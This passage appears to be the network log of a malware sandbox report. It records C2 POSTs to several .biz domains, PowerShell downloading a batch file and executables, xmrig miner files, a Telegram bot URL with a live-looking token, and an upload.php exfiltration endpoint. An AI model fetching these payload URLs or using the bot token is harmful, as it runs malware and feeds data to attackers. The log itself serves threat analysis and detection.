                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200
                                • 172.67.136.167:443
                                  https://zinc-sneark.biz/api
                                  tls, http
                                  2M4078.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://zinc-sneark.biz/api

                                  HTTP Response

                                  200
                                • 172.67.153.96:443
                                  https://dwell-exclaim.biz/api
                                  tls, http
                                  2M4078.exe
                                  1.0kB
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://dwell-exclaim.biz/api

                                  HTTP Response

                                  200
                                • 31.41.244.11:80
                                  http://31.41.244.11/files/unique2/random.exe
                                  http
                                  skotes.exe
                                  455.0kB
                                  15.2MB
                                  9708
                                  15588

                                  HTTP Request

                                  GET http://31.41.244.11/files/7427009775/BhD8htX.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://31.41.244.11/files/151334531/i1A5m12.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://31.41.244.11/files/1818813749/wL3EGdM.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://31.41.244.11/files/unique2/random.exe

                                  HTTP Response

                                  200
                                • 172.67.173.74:443
                                  https://formy-spill.biz/api
                                  tls, http
                                  2M4078.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://formy-spill.biz/api

                                  HTTP Response

                                  200
                                • 104.21.81.153:443
                                  https://se-blurry.biz/api
                                  tls, http
                                  BhD8htX.exe
                                  995 B
                                  4.7kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://se-blurry.biz/api

                                  HTTP Response

                                  200
                                • 172.67.206.64:443
                                  https://covery-mover.biz/api
                                  tls, http
                                  2M4078.exe
                                  1.0kB
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://covery-mover.biz/api

                                  HTTP Response

                                  200
                                • 172.67.136.167:443
                                  https://zinc-sneark.biz/api
                                  tls, http
                                  BhD8htX.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://zinc-sneark.biz/api

                                  HTTP Response

                                  200
                                • 104.21.43.156:443
                                  https://dare-curbys.biz/api
                                  tls, http
                                  2M4078.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://dare-curbys.biz/api

                                  HTTP Response

                                  200
                                • 172.67.153.96:443
                                  https://dwell-exclaim.biz/api
                                  tls, http
                                  BhD8htX.exe
                                  1.0kB
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://dwell-exclaim.biz/api

                                  HTTP Response

                                  200
                                • 104.21.35.246:443
                                  https://print-vexer.biz/api
                                  tls, http
                                  2M4078.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://print-vexer.biz/api

                                  HTTP Response

                                  200
                                • 172.67.173.74:443
                                  https://formy-spill.biz/api
                                  tls, http
                                  BhD8htX.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://formy-spill.biz/api

                                  HTTP Response

                                  200
                                • 23.214.143.155:443
                                  https://steamcommunity.com/profiles/76561199724331900
                                  tls, http
                                  2M4078.exe
                                  1.5kB
                                  43.2kB
                                  21
                                  36

                                  HTTP Request

                                  GET https://steamcommunity.com/profiles/76561199724331900

                                  HTTP Response

                                  200
                                • 172.67.206.64:443
                                  https://covery-mover.biz/api
                                  tls, http
                                  BhD8htX.exe
                                  1.0kB
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://covery-mover.biz/api

                                  HTTP Response

                                  200
                                • 172.67.160.80:443
                                  https://marshal-zhukov.com/api
                                  tls, http
                                  2M4078.exe
                                  1.7kB
                                  10.3kB
                                  14
                                  16

                                  HTTP Request

                                  POST https://marshal-zhukov.com/api

                                  HTTP Response

                                  403

                                  HTTP Request

                                  POST https://marshal-zhukov.com/api

                                  HTTP Response

                                  200
                                • 104.21.43.156:443
                                  https://dare-curbys.biz/api
                                  tls, http
                                  BhD8htX.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://dare-curbys.biz/api

                                  HTTP Response

                                  200
                                • 104.21.35.246:443
                                  https://print-vexer.biz/api
                                  tls, http
                                  BhD8htX.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://print-vexer.biz/api

                                  HTTP Response

                                  200
                                • 23.214.143.155:443
                                  https://steamcommunity.com/profiles/76561199724331900
                                  tls, http
                                  BhD8htX.exe
                                  1.5kB
                                  43.2kB
                                  21
                                  36

                                  HTTP Request

                                  GET https://steamcommunity.com/profiles/76561199724331900

                                  HTTP Response

                                  200
                                • 172.67.160.80:443
                                  https://marshal-zhukov.com/api
                                  tls, http
                                  BhD8htX.exe
                                  1.7kB
                                  10.3kB
                                  14
                                  16

                                  HTTP Request

                                  POST https://marshal-zhukov.com/api

                                  HTTP Response

                                  403

                                  HTTP Request

                                  POST https://marshal-zhukov.com/api

                                  HTTP Response

                                  200
                                • 185.215.113.206:80
                                  http://185.215.113.206/c4becf79229cb002.php
                                  http
                                  3Z39A.exe
                                  819 B
                                  625 B
                                  7
                                  5

                                  HTTP Request

                                  GET http://185.215.113.206/

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.206/c4becf79229cb002.php

                                  HTTP Response

                                  200
                                • 185.215.113.16:80
                                  http://185.215.113.16/off/random.exe
                                  http
                                  skotes.exe
                                  380.6kB
                                  11.1MB
                                  7761
                                  7977

                                  HTTP Request

                                  GET http://185.215.113.16/luma/random.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://185.215.113.16/steam/random.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://185.215.113.16/well/random.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://185.215.113.16/off/random.exe

                                  HTTP Response

                                  200
                                • 172.67.165.166:443
                                  https://atten-supporse.biz/api
                                  tls, http
                                  f56e441c8f.exe
                                  1.0kB
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://atten-supporse.biz/api

                                  HTTP Response

                                  200
                                • 104.21.81.153:443
                                  https://se-blurry.biz/api
                                  tls, http
                                  f56e441c8f.exe
                                  995 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://se-blurry.biz/api

                                  HTTP Response

                                  200
                                • 172.67.136.167:443
                                  https://zinc-sneark.biz/api
                                  tls, http
                                  f56e441c8f.exe
                                  1.4kB
                                  5.1kB
                                  11
                                  10

                                  HTTP Request

                                  POST https://zinc-sneark.biz/api

                                  HTTP Response

                                  200
                                • 172.67.153.96:443
                                  https://dwell-exclaim.biz/api
                                  tls, http
                                  f56e441c8f.exe
                                  1.5kB
                                  5.0kB
                                  12
                                  9

                                  HTTP Request

                                  POST https://dwell-exclaim.biz/api

                                  HTTP Response

                                  200
                                • 172.67.173.74:443
                                  https://formy-spill.biz/api
                                  tls, http
                                  f56e441c8f.exe
                                  1.5kB
                                  4.8kB
                                  12
                                  9

                                  HTTP Request

                                  POST https://formy-spill.biz/api

                                  HTTP Response

                                  200
                                • 172.67.206.64:443
                                  https://covery-mover.biz/api
                                  tls, http
                                  f56e441c8f.exe
                                  1.1kB
                                  4.8kB
                                  10
                                  10

                                  HTTP Request

                                  POST https://covery-mover.biz/api

                                  HTTP Response

                                  200
                                • 104.21.43.156:443
                                  https://dare-curbys.biz/api
                                  tls, http
                                  f56e441c8f.exe
                                  1.1kB
                                  4.8kB
                                  11
                                  9

                                  HTTP Request

                                  POST https://dare-curbys.biz/api

                                  HTTP Response

                                  200
                                • 104.21.35.246:443
                                  https://print-vexer.biz/api
                                  tls, http
                                  f56e441c8f.exe
                                  1.1kB
                                  4.8kB
                                  10
                                  9

                                  HTTP Request

                                  POST https://print-vexer.biz/api

                                  HTTP Response

                                  200
                                • 23.214.143.155:443
                                  https://steamcommunity.com/profiles/76561199724331900
                                  tls, http
                                  f56e441c8f.exe
                                  1.7kB
                                  43.2kB
                                  24
                                  37

                                  HTTP Request

                                  GET https://steamcommunity.com/profiles/76561199724331900

                                  HTTP Response

                                  200
                                • 172.67.160.80:443
                                  https://marshal-zhukov.com/api
                                  tls, http
                                  f56e441c8f.exe
                                  1.7kB
                                  10.4kB
                                  15
                                  17

                                  HTTP Request

                                  POST https://marshal-zhukov.com/api

                                  HTTP Response

                                  403

                                  HTTP Request

                                  POST https://marshal-zhukov.com/api

                                  HTTP Response

                                  200
                                • 185.215.113.206:80
                                  http://185.215.113.206/c4becf79229cb002.php
                                  http
                                  1dd8bdd825.exe
                                  819 B
                                  625 B
                                  7
                                  5

                                  HTTP Request

                                  GET http://185.215.113.206/

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.206/c4becf79229cb002.php

                                  HTTP Response

                                  200
                                • 127.0.0.1:58570
                                  firefox.exe
                                • 216.58.213.14:443
                                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                  tls, http2
                                  firefox.exe
                                  2.0kB
                                  8.9kB
                                  15
                                  16

                                  HTTP Request

                                  GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                • 216.58.213.14:443
                                  youtube.com
                                  tls, http2
                                  firefox.exe
                                  1.4kB
                                  7.6kB
                                  10
                                  10
                                • 34.149.97.1:443
                                  https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                                  tls, http2
                                  firefox.exe
                                  2.1kB
                                  13.7kB
                                  17
                                  22

                                  HTTP Request

                                  GET https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                                • 142.250.187.206:443
                                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                  tls, http2
                                  firefox.exe
                                  2.9kB
                                  66.0kB
                                  26
                                  62

                                  HTTP Request

                                  GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

                                  HTTP Request

                                  GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                • 142.250.200.14:443
                                  consent.youtube.com
                                  tls, http2
                                  firefox.exe
                                  1.4kB
                                  7.6kB
                                  10
                                  10
                                • 34.117.121.53:443
                                  https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                                  tls, http2
                                  firefox.exe
                                  1.6kB
                                  21.2kB
                                  16
                                  26

                                  HTTP Request

                                  GET https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                                • 142.250.187.196:443
                                  https://www.google.com/favicon.ico
                                  tls, http2
                                  firefox.exe
                                  2.0kB
                                  7.4kB
                                  15
                                  16

                                  HTTP Request

                                  GET https://www.google.com/favicon.ico
                                • 45.74.38.211:4782
                                  YLFOGIOE
                                  tls
                                  RegAsm.exe
                                  42.2kB
                                  178.6kB
                                  92
                                  172
                                • 92.63.197.221:80
                                  http://92.63.197.221/add?substr=mixtwo&s=three&sub=
                                  http
                                  4fe69191d8.exe
                                  549 B
                                  92 B
                                  3
                                  2

                                  HTTP Request

                                  GET http://92.63.197.221/add?substr=mixtwo&s=three&sub=
                                • 127.0.0.1:58578
                                  firefox.exe
                                • 203.161.45.11:443
                                  https://exodus.lat/ss.bat
                                  tls, http
                                  powershell.exe
                                  811 B
                                  10.3kB
                                  8
                                  11

                                  HTTP Request

                                  GET https://exodus.lat/ss.bat

                                  HTTP Response

                                  200
                                • 203.161.45.11:443
                                  https://exodus.lat/COMSurrogate.exe
                                  tls, http
                                  powershell.exe
                                  1.5kB
                                  176.8kB
                                  24
                                  130

                                  HTTP Request

                                  GET https://exodus.lat/COMSurrogate.exe

                                  HTTP Response

                                  200
                                • 203.161.45.11:443
                                  https://exodus.lat/COMSurrogate.exe
                                  tls, http
                                  powershell.exe
                                  1.8kB
                                  176.8kB
                                  32
                                  130

                                  HTTP Request

                                  GET https://exodus.lat/COMSurrogate.exe

                                  HTTP Response

                                  200
                                • 172.67.74.152:443
                                  https://api.ipify.org/
                                  tls, http
                                  curl.exe
                                  810 B
                                  4.2kB
                                  9
                                  10

                                  HTTP Request

                                  GET https://api.ipify.org/

                                  HTTP Response

                                  200
                                • 142.250.200.35:80
                                  http://c.pki.goog/r/r4.crl
                                  http
                                  602 B
                                  3.9kB
                                  8
                                  6

                                  HTTP Request

                                  GET http://c.pki.goog/r/gsr1.crl

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://c.pki.goog/r/r4.crl

                                  HTTP Response

                                  200
                                • 203.161.45.11:443
                                  https://cdn-downloads.com/files/nvrtc-builtins64_102.dll
                                  tls, http
                                  COMSurrogate.exe
                                  534.9kB
                                  61.5MB
                                  11391
                                  44018

                                  HTTP Request

                                  GET https://cdn-downloads.com/files/mi.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET https://cdn-downloads.com/files/config.json

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET https://cdn-downloads.com/files/WinRing0x64.sys

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET https://cdn-downloads.com/files/SHA256SUMS

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET https://cdn-downloads.com/files/xmrig-cuda.dll

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET https://cdn-downloads.com/files/nvrtc64_102_0.dll

                                  HTTP Request

                                  GET https://cdn-downloads.com/files/nvrtc-builtins64_102.dll
                                • 203.161.45.11:443
                                  https://exodus.lat/files/upload.php
                                  tls, http
                                  curl.exe
                                  3.0kB
                                  3.9kB
                                  14
                                  10

                                  HTTP Request

                                  POST https://exodus.lat/files/upload.php

                                  HTTP Response

                                  200
                                • 88.221.135.106:80
                                  http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D
                                  http
                                  568 B
                                  1.1kB
                                  7
                                  5

                                  HTTP Request

                                  GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D

                                  HTTP Response

                                  200
                                • 35.190.72.216:443
                                  https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                                  tls, http2
                                  firefox.exe
                                  1.9kB
                                  4.8kB
                                  15
                                  18

                                  HTTP Request

                                  GET https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                                • 142.250.187.206:443
                                  https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                                  tls, http2
                                  firefox.exe
                                  1.5kB
                                  8.9kB
                                  16
                                  21

                                  HTTP Request

                                  GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                                • 88.221.134.209:80
                                  http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                                  http
                                  firefox.exe
                                  6.3kB
                                  506.3kB
                                  131
                                  366

                                  HTTP Request

                                  GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

                                  HTTP Response

                                  200
                                • 74.125.175.169:443
                                  https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com
                                  tls, http
                                  firefox.exe
                                  393.7kB
                                  11.3MB
                                  6348
                                  8097

                                  HTTP Request

                                  GET https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

                                  HTTP Response

                                  200
                                • 142.250.179.238:443
                                  play.google.com
                                  tls
                                  firefox.exe
                                  1.3kB
                                  7.6kB
                                  9
                                  10
                                • 149.154.167.220:443
                                  https://api.telegram.org/bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage
                                  tls, http
                                  COMSurrogate.exe
                                  1.1kB
                                  7.1kB
                                  11
                                  13

                                  HTTP Request

                                  POST https://api.telegram.org/bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage

                                  HTTP Response

                                  200
                                • 95.179.241.203:80
                                  pool.hashvault.pro
                                  http
                                  mi.exe
                                  836 B
                                  1.9kB
                                  6
                                  5
                                • 142.250.200.14:443
                                  consent.youtube.com
                                  tls, http2
                                  firefox.exe
                                  1.3kB
                                  7.6kB
                                  9
                                  10
                                • 188.119.66.185:443
                                  https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359
                                  tls, http
                                  rafencoder.exe
                                  1.4kB
                                  8.2kB
                                  11
                                  13

                                  HTTP Request

                                  GET https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa158305633775b0e650fdba1e9c95b1c92975ccf55bc592fa5a818ece02a1b7e2984c57cad7021ddd372118d73788

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359

                                  HTTP Response

                                  200
                                • 31.214.157.206:2024
                                  rafencoder.exe
                                  605 B
                                  174 B
                                  5
                                  4
                                • 8.8.8.8:53
                                  8.8.8.8.in-addr.arpa
                                  dns
                                  66 B
                                  90 B
                                  1
                                  1

                                  DNS Request

                                  8.8.8.8.in-addr.arpa

                                • 8.8.8.8:53
                                  58.55.71.13.in-addr.arpa
                                  dns
                                  70 B
                                  144 B
                                  1
                                  1

                                  DNS Request

                                  58.55.71.13.in-addr.arpa

                                • 8.8.8.8:53
                                  172.214.232.199.in-addr.arpa
                                  dns
                                  74 B
                                  128 B
                                  1
                                  1

                                  DNS Request

                                  172.214.232.199.in-addr.arpa

                                • 8.8.8.8:53
                                  74.32.126.40.in-addr.arpa
                                  dns
                                  71 B
                                  157 B
                                  1
                                  1

                                  DNS Request

                                  74.32.126.40.in-addr.arpa

                                • 8.8.8.8:53
                                  95.221.229.192.in-addr.arpa
                                  dns
                                  73 B
                                  144 B
                                  1
                                  1

                                  DNS Request

                                  95.221.229.192.in-addr.arpa

                                • 8.8.8.8:53
                                  atten-supporse.biz
                                  dns
                                  f56e441c8f.exe
                                  64 B
                                  96 B
                                  1
                                  1

                                  DNS Request

                                  atten-supporse.biz

                                  DNS Response

                                  172.67.165.166
                                  104.21.16.9

                                • 8.8.8.8:53
                                  166.165.67.172.in-addr.arpa
                                  dns
                                  73 B
                                  135 B
                                  1
                                  1

                                  DNS Request

                                  166.165.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  se-blurry.biz
                                  dns
                                  f56e441c8f.exe
                                  59 B
                                  91 B
                                  1
                                  1

                                  DNS Request

                                  se-blurry.biz

                                  DNS Response

                                  104.21.81.153
                                  172.67.162.65

                                • 8.8.8.8:53
                                  zinc-sneark.biz
                                  dns
                                  f56e441c8f.exe
                                  61 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  zinc-sneark.biz

                                  DNS Response

                                  172.67.136.167
                                  104.21.62.142

                                • 8.8.8.8:53
                                  153.81.21.104.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  153.81.21.104.in-addr.arpa

                                • 8.8.8.8:53
                                  104.219.191.52.in-addr.arpa
                                  dns
                                  73 B
                                  147 B
                                  1
                                  1

                                  DNS Request

                                  104.219.191.52.in-addr.arpa

                                • 8.8.8.8:53
                                  43.113.215.185.in-addr.arpa
                                  dns
                                  73 B
                                  133 B
                                  1
                                  1

                                  DNS Request

                                  43.113.215.185.in-addr.arpa

                                • 8.8.8.8:53
                                  dwell-exclaim.biz
                                  dns
                                  f56e441c8f.exe
                                  63 B
                                  95 B
                                  1
                                  1

                                  DNS Request

                                  dwell-exclaim.biz

                                  DNS Response

                                  172.67.153.96
                                  104.21.88.210

                                • 8.8.8.8:53
                                  167.136.67.172.in-addr.arpa
                                  dns
                                  73 B
                                  135 B
                                  1
                                  1

                                  DNS Request

                                  167.136.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  96.153.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  96.153.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  11.244.41.31.in-addr.arpa
                                  dns
                                  71 B
                                  131 B
                                  1
                                  1

                                  DNS Request

                                  11.244.41.31.in-addr.arpa

                                • 8.8.8.8:53
                                  formy-spill.biz
                                  dns
                                  f56e441c8f.exe
                                  61 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  formy-spill.biz

                                  DNS Response

                                  172.67.173.74
                                  104.21.96.55

                                • 8.8.8.8:53
                                  74.173.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  74.173.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  ratiomun.cyou
                                  dns
                                  BhD8htX.exe
                                  59 B
                                  124 B
                                  1
                                  1

                                  DNS Request

                                  ratiomun.cyou

                                • 8.8.8.8:53
                                  covery-mover.biz
                                  dns
                                  f56e441c8f.exe
                                  62 B
                                  94 B
                                  1
                                  1

                                  DNS Request

                                  covery-mover.biz

                                  DNS Response

                                  172.67.206.64
                                  104.21.58.186

                                • 8.8.8.8:53
                                  dare-curbys.biz
                                  dns
                                  f56e441c8f.exe
                                  61 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  dare-curbys.biz

                                  DNS Response

                                  104.21.43.156
                                  172.67.181.44

                                • 8.8.8.8:53
                                  64.206.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  64.206.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  156.43.21.104.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  156.43.21.104.in-addr.arpa

                                • 8.8.8.8:53
                                  print-vexer.biz
                                  dns
                                  f56e441c8f.exe
                                  61 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  print-vexer.biz

                                  DNS Response

                                  104.21.35.246
                                  172.67.181.192

                                • 8.8.8.8:53
                                  246.35.21.104.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  246.35.21.104.in-addr.arpa

                                • 8.8.8.8:53
                                  impend-differ.biz
                                  dns
                                  f56e441c8f.exe
                                  63 B
                                  125 B
                                  1
                                  1

                                  DNS Request

                                  impend-differ.biz

                                • 8.8.8.8:53
                                  steamcommunity.com
                                  dns
                                  f56e441c8f.exe
                                  64 B
                                  80 B
                                  1
                                  1

                                  DNS Request

                                  steamcommunity.com

                                  DNS Response

                                  23.214.143.155

                                • 8.8.8.8:53
                                  marshal-zhukov.com
                                  dns
                                  f56e441c8f.exe
                                  64 B
                                  96 B
                                  1
                                  1

                                  DNS Request

                                  marshal-zhukov.com

                                  DNS Response

                                  172.67.160.80
                                  104.21.82.174

                                • 8.8.8.8:53
                                  155.143.214.23.in-addr.arpa
                                  dns
                                  73 B
                                  139 B
                                  1
                                  1

                                  DNS Request

                                  155.143.214.23.in-addr.arpa

                                • 8.8.8.8:53
                                  80.160.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  80.160.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  228.249.119.40.in-addr.arpa
                                  dns
                                  73 B
                                  159 B
                                  1
                                  1

                                  DNS Request

                                  228.249.119.40.in-addr.arpa

                                • 8.8.8.8:53
                                  206.113.215.185.in-addr.arpa
                                  dns
                                  74 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  206.113.215.185.in-addr.arpa

                                • 8.8.8.8:53
                                  16.113.215.185.in-addr.arpa
                                  dns
                                  73 B
                                  133 B
                                  1
                                  1

                                  DNS Request

                                  16.113.215.185.in-addr.arpa

                                • 8.8.8.8:53
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  dns
                                  Dr.com
                                  273 B
                                  166 B
                                  3
                                  1

                                  DNS Request

                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

                                  DNS Request

                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

                                  DNS Request

                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

                                • 8.8.8.8:53
                                  197.87.175.4.in-addr.arpa
                                  dns
                                  71 B
                                  157 B
                                  1
                                  1

                                  DNS Request

                                  197.87.175.4.in-addr.arpa

                                • 8.8.8.8:53
                                  18.31.95.13.in-addr.arpa
                                  dns
                                  70 B
                                  144 B
                                  1
                                  1

                                  DNS Request

                                  18.31.95.13.in-addr.arpa

                                • 8.8.8.8:53
                                  92.12.20.2.in-addr.arpa
                                  dns
                                  69 B
                                  131 B
                                  1
                                  1

                                  DNS Request

                                  92.12.20.2.in-addr.arpa

                                • 8.8.8.8:53
                                  impend-differ.biz
                                  dns
                                  f56e441c8f.exe
                                  63 B
                                  125 B
                                  1
                                  1

                                  DNS Request

                                  impend-differ.biz

                                • 8.8.8.8:53
                                  steamcommunity.com
                                  dns
                                  f56e441c8f.exe
                                  64 B
                                  80 B
                                  1
                                  1

                                  DNS Request

                                  steamcommunity.com

                                  DNS Response

                                  23.214.143.155

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  57 B
                                  73 B
                                  1
                                  1

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  216.58.213.14

                                • 8.8.8.8:53
                                  spocs.getpocket.com
                                  dns
                                  firefox.exe
                                  130 B
                                  262 B
                                  2
                                  2

                                  DNS Request

                                  spocs.getpocket.com

                                  DNS Response

                                  34.117.188.166

                                  DNS Request

                                  spocs.getpocket.com

                                  DNS Response

                                  34.117.188.166

                                • 8.8.8.8:53
                                  firefox-api-proxy.cdn.mozilla.net
                                  dns
                                  firefox.exe
                                  79 B
                                  160 B
                                  1
                                  1

                                  DNS Request

                                  firefox-api-proxy.cdn.mozilla.net

                                  DNS Response

                                  34.149.97.1

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  57 B
                                  73 B
                                  1
                                  1

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  216.58.213.14

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  114 B
                                  170 B
                                  2
                                  2

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  2a00:1450:4009:816::200e

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  2a00:1450:4009:816::200e

                                • 8.8.8.8:53
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  200 B
                                  232 B
                                  2
                                  2

                                  DNS Request

                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Response

                                  34.149.97.1

                                  DNS Request

                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Response

                                  34.149.97.1

                                • 8.8.8.8:53
                                  prod.ads.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  164 B
                                  196 B
                                  2
                                  2

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.188.166

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.188.166

                                • 8.8.8.8:53
                                  172.210.232.199.in-addr.arpa
                                  dns
                                  148 B
                                  256 B
                                  2
                                  2

                                  DNS Request

                                  172.210.232.199.in-addr.arpa

                                  DNS Request

                                  172.210.232.199.in-addr.arpa

